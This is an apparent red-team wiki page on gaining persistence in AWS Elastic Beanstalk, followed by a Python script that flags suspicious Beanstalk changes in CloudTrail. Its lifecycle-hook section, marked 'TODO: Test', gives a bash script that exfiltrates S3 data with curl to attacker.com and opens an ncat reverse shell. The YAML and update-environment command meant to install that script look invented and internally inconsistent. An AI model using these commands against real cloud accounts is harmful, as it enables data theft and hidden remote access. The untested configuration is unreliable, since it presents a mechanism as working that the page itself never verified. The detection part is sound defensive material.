AWS - Elastic Beanstalk Persistence

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Elastic Beanstalk

For more information check:

AWS - Elastic Beanstalk Enum

Persistence in Instance

To maintain persistence inside the AWS account, a persistence mechanism could be introduced inside the instance (cron job, ssh key...) so that the attacker can access it and steal the IAM role credentials from the metadata service.

Backdoor in Version

An attacker could backdoor the code inside the S3 repo so that it always executes the backdoor alongside the expected code.

New Backdoored Version

Instead of changing the code in the current version, the attacker could deploy a new backdoored version of the application.

Abusing Custom Resource Lifecycle Hooks

TODO: Test

Elastic Beanstalk provides lifecycle hooks that let you run custom scripts during instance provisioning and termination. An attacker could configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account.

```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
  AWSEBAutoScalingGroup:
    Metadata:
      AWS::ElasticBeanstalk::Ext:
        TriggerConfiguration:
          triggers:
            - name: stealthy-lifecycle-hook
              events:
                - "autoscaling:EC2_INSTANCE_LAUNCH"
                - "autoscaling:EC2_INSTANCE_TERMINATE"
              target:
                ref: "AWS::ElasticBeanstalk::Environment"
                arn:
                  Fn::GetAtt:
                    - "AWS::ElasticBeanstalk::Environment"
                    - "Arn"
  stealthyLifecycleHook:
    Type: AWS::AutoScaling::LifecycleHook
    Properties:
      AutoScalingGroupName:
        Ref: AWSEBAutoScalingGroup
      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
      NotificationTargetARN:
        Ref: stealthy-lifecycle-hook
      RoleARN:
        Fn::GetAtt:
          - AWSEBAutoScalingGroup
          - Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
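
The detection side of the techniques above (a modified source bundle in S3, a new application version, an `update-environment` configuration change), as an added example that is not part of the original page: it triages CloudTrail records for Beanstalk changes made by principals outside an allow-list. The `DEPLOYERS` allow-list, the role and user names, and the sample records are constructed assumptions; the `requestParameters` layout is assumed to mirror the API parameter names.

```python
import re

# Assumption: the only principal expected to deploy (hypothetical CI role).
DEPLOYERS = {"arn:aws:sts::111122223333:assumed-role/ci-deploy/pipeline"}
# Beanstalk keeps source bundles in elasticbeanstalk-<region>-<account-id>.
EB_BUCKET = re.compile(r"^elasticbeanstalk-[a-z0-9-]+-\d{12}$")
EB_CHANGES = {"CreateApplicationVersion", "UpdateEnvironment"}
S3_WRITES = {"PutObject", "CopyObject", "CompleteMultipartUpload"}

def classify(event):
    """Return a finding for a Beanstalk change by an unexpected principal."""
    actor = event.get("userIdentity", {}).get("arn", "unknown")
    if actor in DEPLOYERS:
        return None
    source, name = event.get("eventSource"), event.get("eventName")
    params = event.get("requestParameters") or {}
    if source == "elasticbeanstalk.amazonaws.com" and name in EB_CHANGES:
        target = params.get("environmentName") or params.get("applicationName", "?")
        kind = "option settings" if params.get("optionSettings") else "version"
        return f"{name} ({kind}) on {target} by {actor}"
    if (source == "s3.amazonaws.com" and name in S3_WRITES
            and EB_BUCKET.match(params.get("bucketName", ""))):
        return f"{name} to source bundle {params.get('key')} by {actor}"
    return None

def triage(events):
    """Keep only the records that produced a finding."""
    return [finding for finding in map(classify, events) if finding]

# Constructed sample records; field layout follows CloudTrail, values are made up.
CI = "arn:aws:sts::111122223333:assumed-role/ci-deploy/pipeline"
DEV = "arn:aws:iam::111122223333:user/dev-laptop"
SAMPLE = [
    {"eventSource": "elasticbeanstalk.amazonaws.com", "eventName": "CreateApplicationVersion",
     "userIdentity": {"arn": CI}, "requestParameters": {"applicationName": "shop", "versionLabel": "v42"}},
    {"eventSource": "elasticbeanstalk.amazonaws.com", "eventName": "UpdateEnvironment",
     "userIdentity": {"arn": DEV}, "requestParameters": {"environmentName": "my-env",
      "optionSettings": [{"namespace": "aws:elasticbeanstalk:customoption", "optionName": "CustomConfigurationTemplate"}]}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject", "userIdentity": {"arn": DEV},
     "requestParameters": {"bucketName": "elasticbeanstalk-us-east-1-111122223333", "key": "shop/v41.zip"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject", "userIdentity": {"arn": DEV},
     "requestParameters": {"bucketName": "team-reports", "key": "q3.csv"}},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

S3 object-level writes only appear in CloudTrail when data events are enabled for the Beanstalk bucket, so the source bundle check depends on that logging being turned on.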